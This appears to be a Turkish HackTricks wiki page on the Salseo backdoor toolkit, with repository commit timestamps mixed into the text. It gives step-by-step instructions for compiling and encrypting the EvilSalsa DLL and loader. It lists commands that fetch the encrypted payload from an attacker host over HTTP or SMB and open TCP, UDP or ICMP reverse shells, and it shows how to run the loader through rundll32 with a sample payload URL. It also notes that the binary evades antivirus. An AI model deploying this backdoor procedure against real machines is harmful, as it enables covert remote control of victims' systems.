hacktricks/c2/salseo.md

185 lines
7.7 KiB
Markdown
Raw Normal View History

2024-04-06 19:40:41 +00:00
# Salseo
{% hint style="success" %}
AWS Hacking'i öğrenin ve pratik yapın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Training AWS Red Team Expert (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve pratik yapın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Training GCP Red Team Expert (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
2024-04-06 19:40:41 +00:00
<details>
2024-04-06 19:40:41 +00:00
<summary>HackTricks'i Destekleyin</summary>
2024-04-06 19:40:41 +00:00
* [**abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın ya da **Twitter'da** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)** bizi takip edin.**
* **Hacking ipuçlarını paylaşmak için** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna PR gönderin.
2024-04-06 19:40:41 +00:00
</details>
{% endhint %}
2024-04-06 19:40:41 +00:00
## Binaries'leri Derleme
2024-04-06 19:40:41 +00:00
Github'dan kaynak kodunu indirin ve **EvilSalsa** ve **SalseoLoader**'ı derleyin. Kodu derlemek için **Visual Studio**'nun yüklü olması gerekmektedir.
2024-04-06 19:40:41 +00:00
Bu projeleri, kullanacağınız Windows kutusunun mimarisi için derleyin (Eğer Windows x64 destekliyorsa, bu mimariler için derleyin).
2024-04-06 19:40:41 +00:00
**Visual Studio**'da **sol "Build" Sekmesi** içindeki **"Platform Target"** kısmından **mimariyi seçebilirsiniz.**
2024-04-06 19:40:41 +00:00
(\*\*Bu seçenekleri bulamazsanız **"Project Tab"**'ına tıklayın ve ardından **"\<Project Name> Properties"**'e tıklayın)
2024-04-06 19:40:41 +00:00
![](<../.gitbook/assets/image (839).png>)
2024-04-06 19:40:41 +00:00
Sonra, her iki projeyi de derleyin (Build -> Build Solution) (Kayıtlarda çalıştırılabilir dosyanın yolu görünecektir):
2024-04-06 19:40:41 +00:00
![](<../.gitbook/assets/image (381).png>)
2024-04-06 19:40:41 +00:00
## Arka Kapıyı Hazırlama
Öncelikle, **EvilSalsa.dll**'yi kodlamanız gerekecek. Bunu yapmak için, **encrypterassembly.py** python script'ini kullanabilir veya **EncrypterAssembly** projesini derleyebilirsiniz:
2024-04-06 19:40:41 +00:00
### **Python**
```
python EncrypterAssembly/encrypterassembly.py <FILE> <PASSWORD> <OUTPUT_FILE>
python EncrypterAssembly/encrypterassembly.py EvilSalsax.dll password evilsalsa.dll.txt
```
### Windows
```
EncrypterAssembly.exe <FILE> <PASSWORD> <OUTPUT_FILE>
EncrypterAssembly.exe EvilSalsax.dll password evilsalsa.dll.txt
```
Tamam, şimdi Salseo işlemlerini gerçekleştirmek için ihtiyacınız olan her şeye sahipsiniz: **encoded EvilDalsa.dll** ve **SalseoLoader'ın binary'si.**
2024-04-06 19:40:41 +00:00
**SalseoLoader.exe binary'sini makineye yükleyin. Hiçbir antivirüs tarafından tespit edilmemelidir...**
2024-04-06 19:40:41 +00:00
## **Arka kapıyı çalıştırma**
2024-04-06 19:40:41 +00:00
### **TCP ters shell almak (HTTP üzerinden encoded dll indirme)**
2024-04-06 19:40:41 +00:00
nc'yi ters shell dinleyicisi olarak başlatmayı ve encoded evilsalsa'yı sunmak için bir HTTP sunucusu kurmayı unutmayın.
2024-04-06 19:40:41 +00:00
```
SalseoLoader.exe password http://<Attacker-IP>/evilsalsa.dll.txt reversetcp <Attacker-IP> <Port>
```
### **UDP ters shell almak (SMB üzerinden kodlanmış dll indirme)**
2024-04-06 19:40:41 +00:00
nc'yi ters shell dinleyicisi olarak başlatmayı ve kodlanmış evilsalsa'yı sunmak için bir SMB sunucusu kurmayı unutmayın.
2024-04-06 19:40:41 +00:00
```
SalseoLoader.exe password \\<Attacker-IP>/folder/evilsalsa.dll.txt reverseudp <Attacker-IP> <Port>
```
### **ICMP ters shell almak (şifrelenmiş dll zaten kurbanın içinde)**
2024-04-06 19:40:41 +00:00
**Bu sefer ters shell almak için istemcide özel bir araca ihtiyacınız var. İndirin:** [**https://github.com/inquisb/icmpsh**](https://github.com/inquisb/icmpsh)
2024-04-06 19:40:41 +00:00
#### **ICMP Yanıtlarını Devre Dışı Bırak:**
2024-04-06 19:40:41 +00:00
```
sysctl -w net.ipv4.icmp_echo_ignore_all=1
#You finish, you can enable it again running:
sysctl -w net.ipv4.icmp_echo_ignore_all=0
```
#### Müşteriyi çalıştır:
2024-04-06 19:40:41 +00:00
```
python icmpsh_m.py "<Attacker-IP>" "<Victm-IP>"
```
#### Kurbanın içinde, salseo şeyini çalıştıralım:
```
SalseoLoader.exe password C:/Path/to/evilsalsa.dll.txt reverseicmp <Attacker-IP>
```
## SalseoLoader'ı ana fonksiyonu dışa aktaran DLL olarak derleme
2024-04-06 19:40:41 +00:00
SalseoLoader projesini Visual Studio ile açın.
2024-04-06 19:40:41 +00:00
### Ana fonksiyondan önce ekleyin: \[DllExport]
2024-04-06 19:40:41 +00:00
![](<../.gitbook/assets/image (409).png>)
2024-04-06 19:40:41 +00:00
### Bu proje için DllExport'ı yükleyin
2024-04-06 19:40:41 +00:00
#### **Araçlar** --> **NuGet Paket Yöneticisi** --> **Çözüm için NuGet Paketlerini Yönet...**
2024-04-06 19:40:41 +00:00
![](<../.gitbook/assets/image (881).png>)
2024-04-06 19:40:41 +00:00
#### **DllExport paketini arayın (Gözat sekmesini kullanarak) ve Yükle'ye basın (ve açılan pencereyi kabul edin)**
2024-04-06 19:40:41 +00:00
![](<../.gitbook/assets/image (100).png>)
2024-04-06 19:40:41 +00:00
Proje klasörünüzde **DllExport.bat** ve **DllExport\_Configure.bat** dosyaları belirdi.
2024-04-06 19:40:41 +00:00
### **U**ninstall DllExport
2024-04-06 19:40:41 +00:00
**Kaldır**'a basın (evet, garip ama bana güvenin, bu gerekli)
2024-04-06 19:40:41 +00:00
![](<../.gitbook/assets/image (97).png>)
2024-04-06 19:40:41 +00:00
### **Visual Studio'dan çıkın ve DllExport\_configure'ı çalıştırın**
2024-04-06 19:40:41 +00:00
Sadece **çıkın** Visual Studio'dan
2024-04-06 19:40:41 +00:00
Sonra, **SalseoLoader klasörünüze** gidin ve **DllExport\_Configure.bat**'ı çalıştırın.
2024-04-06 19:40:41 +00:00
**x64**'ü seçin (eğer x64 bir kutu içinde kullanacaksanız, benim durumum buydu), **System.Runtime.InteropServices**'i seçin ( **DllExport için Ad Alanı** içinde) ve **Uygula**'ya basın.
2024-04-06 19:40:41 +00:00
![](<../.gitbook/assets/image (882).png>)
2024-04-06 19:40:41 +00:00
### **Projeyi tekrar Visual Studio ile açın**
2024-04-06 19:40:41 +00:00
**\[DllExport]** artık hata olarak işaretlenmemelidir.
2024-04-06 19:40:41 +00:00
![](<../.gitbook/assets/image (670).png>)
2024-04-06 19:40:41 +00:00
### Çözümü derleyin
**Çıktı Türü = Sınıf Kütüphanesi**'ni seçin (Proje --> SalseoLoader Özellikleri --> Uygulama --> Çıktı türü = Sınıf Kütüphanesi)
2024-04-06 19:40:41 +00:00
![](<../.gitbook/assets/image (847).png>)
2024-04-06 19:40:41 +00:00
**x64** **platformunu** seçin (Proje --> SalseoLoader Özellikleri --> Derleme --> Platform hedefi = x64)
2024-04-06 19:40:41 +00:00
![](<../.gitbook/assets/image (285).png>)
2024-04-06 19:40:41 +00:00
Çözümü **derlemek** için: Derle --> Çözümü Derle (Çıktı konsolunun içinde yeni DLL'in yolu görünecektir)
2024-04-06 19:40:41 +00:00
### Oluşturulan Dll'i test edin
2024-04-06 19:40:41 +00:00
Dll'i test etmek istediğiniz yere kopyalayın ve yapıştırın.
2024-04-06 19:40:41 +00:00
Çalıştırın:
2024-04-06 19:40:41 +00:00
```
rundll32.exe SalseoLoader.dll,main
```
Eğer hata görünmüyorsa, muhtemelen işlevsel bir DLL'niz var!!
## DLL kullanarak bir shell alın
2024-04-06 19:40:41 +00:00
Bir **HTTP** **sunucusu** kullanmayı ve bir **nc** **dinleyicisi** ayarlamayı unutmayın.
2024-04-06 19:40:41 +00:00
### Powershell
```
$env:pass="password"
$env:payload="http://10.2.0.5/evilsalsax64.dll.txt"
$env:lhost="10.2.0.5"
$env:lport="1337"
$env:shell="reversetcp"
rundll32.exe SalseoLoader.dll,main
```
### CMD
```
set pass=password
set payload=http://10.2.0.5/evilsalsax64.dll.txt
set lhost=10.2.0.5
set lport=1337
set shell=reversetcp
rundll32.exe SalseoLoader.dll,main
```
{% hint style="success" %}
AWS Hacking'i öğrenin ve pratik yapın:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks Eğitim AWS Kırmızı Takım Uzmanı (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
GCP Hacking'i öğrenin ve pratik yapın: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks Eğitim GCP Kırmızı Takım Uzmanı (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
2024-04-06 19:40:41 +00:00
<details>
2024-04-06 19:40:41 +00:00
<summary>HackTricks'i Destekleyin</summary>
2024-04-06 19:40:41 +00:00
* [**abonelik planlarını**](https://github.com/sponsors/carlospolop) kontrol edin!
* **💬 [**Discord grubuna**](https://discord.gg/hRep4RUj7f) veya [**telegram grubuna**](https://t.me/peass) katılın ya da **Twitter'da** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**'i takip edin.**
* **Hacking ipuçlarını paylaşmak için** [**HackTricks**](https://github.com/carlospolop/hacktricks) ve [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github reposuna PR gönderin.
2024-04-06 19:40:41 +00:00
</details>
{% endhint %}